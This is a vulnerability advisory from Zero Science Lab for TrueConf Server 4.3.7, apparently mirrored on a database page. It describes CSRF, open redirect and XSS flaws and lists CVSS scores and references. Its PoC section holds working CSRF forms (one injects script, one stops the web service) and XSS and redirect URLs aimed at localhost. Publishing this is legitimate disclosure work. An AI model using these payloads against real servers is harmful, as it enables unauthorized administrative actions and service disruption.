Lucene search

K
zeroscienceGjoko KrsticZSL-2017-5393
HistoryJan 29, 2017 - 12:00 a.m.

TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities

2017-01-2900:00:00
Gjoko Krstic
zeroscience.mk
227

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score

6.5

Confidence

High

EPSS

0.002

Percentile

55.5%

Title: TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
Advisory ID: ZSL-2017-5393
Type: Local/Remote
Impact: Cross-Site Scripting, Spoofing
Risk: (4/5)
Release Date: 29.01.2017

Summary

TrueConf Server is a powerful, high-quality and highly secured video conferencing software server. It is specially designed to work with up to 250 participants in a multipoint conference over LAN or VPN networks. TrueConf Server requires no hardware and includes client applications for all popular platforms, making it an easy-to-set up, unified communications solution.

Description

The administration interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Input passed via the ‘redirect_url’ GET parameter is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.

TrueConf also suffers from multiple stored, reflected and DOM XSS issues when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Vendor

TrueConf LLC - <https://www.trueconf.com>

Affected Version

4.3.7.12255
4.3.7.12219

Tested On

Microsoft Windows 7 Professional SP1 (EN)
Apache/2.4.17 (Win32)
PHP/5.4.41

Vendor Status

[24.03.2023] Vendor provides fixes in TrueConf Server 5.0.2.

PoC

trueconf_mv.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/41184/&gt;
[2] <https://cxsecurity.com/issue/WLB-2017010231&gt;
[3] <https://packetstormsecurity.com/files/140808&gt;
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/121476&gt;
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/121477&gt;
[6] <https://exchange.xforce.ibmcloud.com/vulnerabilities/121478&gt;
[7] <https://exchange.xforce.ibmcloud.com/vulnerabilities/230138&gt;
[8] <https://exchange.xforce.ibmcloud.com/vulnerabilities/230137&gt;
[9] <https://exchange.xforce.ibmcloud.com/vulnerabilities/230140&gt;
[10] <https://exchange.xforce.ibmcloud.com/vulnerabilities/230139&gt;
[11] <https://exchange.xforce.ibmcloud.com/vulnerabilities/230136&gt;
[12] <https://bdu.fstec.ru/vul/2022-04036&gt;
[13] <https://bdu.fstec.ru/vul/2022-04037&gt;
[14] <https://bdu.fstec.ru/vul/2022-04035&gt;
[15] <https://bdu.fstec.ru/vul/2022-04038&gt;
[16] <https://bdu.fstec.ru/vul/2022-04034&gt;
[17] <https://bdu.fstec.ru/vul/2022-04089&gt;
[18] <https://vulners.com/cve/CVE-2017-20113&gt;
[19] <https://vulners.com/cve/CVE-2017-20114&gt;
[20] <https://vulners.com/cve/CVE-2017-20115&gt;
[21] <https://vulners.com/cve/CVE-2017-20116&gt;
[22] <https://vulners.com/cve/CVE-2017-20117&gt;
[23] <https://vulners.com/cve/CVE-2017-20118&gt;
[24] <https://vulners.com/cve/CVE-2017-20119&gt;
[25] <https://vulners.com/cve/CVE-2017-20120&gt;
[26] <https://nvd.nist.gov/vuln/detail/CVE-2017-20113&gt;
[27] <https://nvd.nist.gov/vuln/detail/CVE-2017-20114&gt;
[28] <https://nvd.nist.gov/vuln/detail/CVE-2017-20115&gt;
[29] <https://nvd.nist.gov/vuln/detail/CVE-2017-20116&gt;
[30] <https://nvd.nist.gov/vuln/detail/CVE-2017-20117&gt;
[31] <https://nvd.nist.gov/vuln/detail/CVE-2017-20118&gt;
[32] <https://nvd.nist.gov/vuln/detail/CVE-2017-20119&gt;
[33] <https://nvd.nist.gov/vuln/detail/CVE-2017-20120&gt;
[34] <https://trueconf.com/products/server/changelog.html&gt;

Changelog

[29.01.2017] - Initial release
[01.02.2017] - Added reference [1], [2] and [3]
[09.02.2017] - Added reference [4], [5] and [6]
[24.03.2023] - Added vendor status and reference [7], [8], [9], [10], [11], [12], [13], [14], [15], [16], [17], [18], [19], [20], [21], [22], [23], [24], [25], [26], [27], [28], [29], [30], [31], [32], [33] and [34]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities


Vendor: TrueConf LLC
Product web page: https://www.trueconf.com
Affected version: 4.3.7.12255 and 4.3.7.12219

Summary: TrueConf Server is a powerful, high-quality and highly secured
video conferencing software server. It is specially designed to work with
up to 250 participants in a multipoint conference over LAN or VPN networks.
TrueConf Server requires no hardware and includes client applications for
all popular platforms, making it an easy-to-set up, unified communications
solution.

Desc: The administration interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Input passed via the 'redirect_url' GET parameter is not properly verified before
being used to redirect users. This can be exploited to redirect a user to an
arbitrary website e.g. when a user clicks a specially crafted link to the affected
script hosted on a trusted domain.

TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
input passed via several parameters to several scripts is not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an affected site.


Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Apache/2.4.17 (Win32)
           PHP/5.4.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5393
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php


01.11.2016

--


CSRF Stored XSS:
----------------


  </p>
<form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
<input name="send_invite_mail" type="hidden" value="1"/>
<input name="invitation_type" type="hidden" value="-1"/>
<input name="hide_invitation_type" type="hidden" value="-1"/>
<input name="date" type="hidden" value="22.01.2017"/>
<input name="time-field" type="hidden" value="17:27"/>
<input name="time_zone" type="hidden" value="60"/>
<input name="subtype" type="hidden" value="3"/>
<input name="podiums" type="hidden" value="6"/>
<input name="cid" type="hidden" value="\c\dfa95f7e1d"/>
<input name="key" type="hidden" value="dfa95f7e1d"/>
<input name="topic" type="hidden" value="&lt;script&gt;alert('XSS')&lt;/script&gt;"/>
<input name="description" type="hidden" value=""/>
<input name="owner" type="hidden" value=""/>
<input name="gconf-edit" type="hidden" value="ok"/>
<input name="webTtype" type="hidden" value="0"/>
<input type="submit" value="Submit form"/>
</form>
  




Reflected XSS:
--------------

http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img onerror="confirm(251)" src="j"/>
http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><script>prompt(251)</script>
http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&amp;sort=name
http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?



DOM XSS:
--------

http://127.0.0.1:8888/admin/group?'\&gt;<script>confirm("XSS")</script>
http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"&gt;<script>alert("XSS")</script>



Open Redirect:
--------------

Request:

GET /admin/general/change-lang?lang_on=en&amp;redirect_url=http://www.zeroscience.mk HTTP/1.1
Host: 127.0.0.1:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Response:

HTTP/1.1 302 Found
Date: Thu, 22 Sep 2016 21:15:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.zeroscience.mk
Content-Length: 0
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8



CSRF Stop Web Service:
----------------------


  
    <form action="http://127.0.0.1/admin/service/stop/" method="POST">
<input type="submit" value="Submit form"/>
</form>
</div></body></html>

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

CVSS3

8.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

AI Score

6.5

Confidence

High

EPSS

0.002

Percentile

55.5%

Related for ZSL-2017-5393